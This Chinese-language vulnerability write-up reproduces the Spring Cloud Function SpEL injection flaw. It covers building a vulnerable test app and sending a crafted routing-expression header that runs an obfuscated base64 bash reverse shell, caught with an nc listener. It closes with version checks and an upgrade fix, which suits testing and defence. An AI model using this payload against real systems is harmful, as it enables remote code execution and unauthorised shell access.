漏洞描述
Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。
影响版本
Spring Cloud Function SPEL表达式注入漏洞影响范围:
3 <= spring-cloud-function-context <= 3.2.2
3 <= spring-cloud-function-core <= 3.2.2
编译环境
1、在IDEA中选择新建项目,然后选择Spring Initializr
,输入随机项目名称,然后选择java版本和jdk版本后点击下一步。
2、选择Spring Web
和Function
作为依赖项,点击完成。
3、配置pom.xml,添加漏洞组件版本号
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-function-web</artifactId>
<version>3.2.2</version>
4、 在src\main\resources\application.properties增加如下修改端口
server.port=80
如果本地复现,可以直接在idea中运行项目即可。如果要放到服务器上复现,可以编译成jar包。参照后面的步骤。
5、编译配置
5.1 修改pom.xml,增加finalName
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
<finalName>springcloudspel</finalName>
</build>
5.2 选择右边的mavn 找打项目 Lifecycle下的package打包。
6、将jar包放到服务器执行。
漏洞复现
服务器运行测试程序:
本地开监听
nc -lvnp 88
发送exp
POST /functionRouter HTTP/1.1
Host: 127.0.0.1
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODggMD4mMQo=}|{base64,-d}|{bash,-i}")
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
xxx
触发反弹shell:
缓解措施
高危:目前漏洞细节和利用代码已经公开,攻击者可利用该漏洞远程在目标系统上执行任意代码,建议使用相关系统的用户尽快采取安全措施。
1、检测:
对使用了spring-cloud-function-context 组件的项目代码进 行排查,可用以下命令查看版本:
grep-A 2’spring-cloud-function-context’pom.xml
grep-A 2’spring-cloud-function-core’pom.xml
若当前版本在受影响范围内,则存在安全风险。
2、处置:
更新Spring Cloud Function到3.2.3。